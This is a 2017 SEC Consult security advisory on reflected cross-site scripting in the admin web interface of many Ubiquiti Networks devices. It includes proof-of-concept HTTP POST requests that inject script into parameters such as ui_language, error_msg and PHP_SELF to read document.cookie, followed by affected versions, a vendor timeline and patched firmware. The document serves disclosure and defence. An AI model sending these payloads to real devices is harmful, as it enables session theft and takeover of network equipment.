SEC Consult Vulnerability Lab Security Advisory < 20170620-0 >
=======================================================================
title: Multiple Reflected Cross Site Scripting (XSS)
product: Multiple Ubiquiti Networks products, e.g.
TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
Power AP N, AF24, AF24HD
vulnerable version: v1.3.3 (SW), v6.0 (XM), v3.2 (AF24)
fixed version: v1.3.4 (SW), v6.0.1 (XM), v3.2.2 (AF24)
CVE number: -
impact: Medium
homepage: www.ubnt.com
found: 2017-02-02
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
=======================================================================
Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."
Source: ir.ubnt.com
Business recommendation:
------------------------
SEC Consult recommends to install the patched firmware.
Vulnerability overview/description:
-----------------------------------
1) Reflected Cross Site Scripting (XSS) via POST request - HackerOne #203781
A reflected cross site scripting vulnerability was identified in 'ticket.cgi'
and 'login.cgi' and many other CGI scripts in the admin interface. The
parameter 'ui_language' is returned without any sanitization of the input. Other
parameters are also prone to XSS because of the same reason. An attacker can
exploit these vulnerabilities to steal cookies from the attacked user in order to
login remotely on the device. An attacker is also able to perform actions in
the context of the attacked user.
This vulnerability was found earlier by another bug bounty participant
on HackerOne. It was numbered with #158287.
Proof of concept:
-----------------
1) Reflected Cross Site Scripting (XSS) via POST request
To produce a reflected XSS, the following requests can be used for firmware
v6.0 (XM):
Request 1:
-------------------------------------------------------------------------------
POST /ticket.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
ui_language="></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Request 2:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
ui_language="></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
The'PHP_SELF' parameter is injectable in the same way. The 'error_msg' can be
exploited by setting the 'ui_language' to a random parameter:
Request 3:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
ui_language=1
error_msg=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Since parameter names are different in firmware v1.3.3 (SW) other names must
be used for a XSS PoC in those versions.
Request 1:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
uri=1
error_msg=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Request 2:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
uri=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Request 3:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
PHP_SELF=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
The latter requests used 'login.cgi' and 'ticket.cgi' but many more scripts in
the administrative panel are prone to this type of vulnerability. The PoC for
the AirFiber series looks like request 3 from above.
Vulnerable / tested versions:
-----------------------------
(Rocket) M5 - v6.0 (XM)
TS-8-PRO - v1.3.3 (SW)
(AirFiber) AF24 - v3.2 (AF24)
Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are affected
as well:
Ubiquiti Networks AF-2X (Version: AF2X v3.2 )
Ubiquiti Networks AF-3X (Version: AF3X v3.2)
Ubiquiti Networks AF5 (Version: AF5 v3.2)
Ubiquiti Networks AF5U (Version: AF5 v3.2)
Ubiquiti Networks AF-5X (Version: AF5X v3.2.1)
Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4)
Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4)
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0)
Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4)
Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0)
Ubiquiti Networks PBE-5AC-300 (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-300-ISO (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-400 (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-400-ISO (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-500 (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-500-ISO (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-620 (Version: XC v7.2.4)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0)
Ubiquiti Networks R5AC-Lite (Version: XC v7.2.4)
Ubiquiti Networks R5AC-PRISM (Version: XC v7.2.4)
Ubiquiti Networks R5AC-PTMP (Version: XC v7.2.4)
Ubiquiti Networks R5AC-PTP (Version: XC v7.2.4)
Ubiquiti Networks RM2-Ti (Version: XW v6.0)
Ubiquiti Networks RM5-Ti (Version: XW v6.0)
Vendor contact timeline:
------------------------
2017-02-06: Contacting vendor via HackerOne
2017-02-15: Vendor marked POST XSS as duplicate to: #158287
2017-02-21: Asking when a patch will be available; No answer.
2017-03-17: Asking for a status update. Vendor responds, that
the vulnerability is resolved in the newest firmware
- v1.3.4 (SW) / v6.0.1 (XM) / v3.2.2 (AF24).
2017-03-20: Informing the vendor that the release date has been
set to 2017-03-22.
2017-03-20: Vendor ask for more time because the vulnerability is
not fixed in all devices. Shifted release to 2017-06-19.
2017-03-21: Asking for a estimated time-frame. Vendor needs 1-3 weeks
in order to provide a fix. Service release for AirOS v8.0.2
(AC) and AirOS v6.0.2 (M) are planned.
2017-03-22: Fixes confirmed
2017-05-15: Contacted vendor via e-mail and set the publication date
to 2017-06-20.
2017-06-20: Public release of security advisory
Solution:
---------
Upgrade to firmware version v1.3.4 (SW), v6.0.1 (XM), v3.2.2 (AF24) or
later.
Workaround:
-----------
No workaround
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
EOF T. Weber / @2017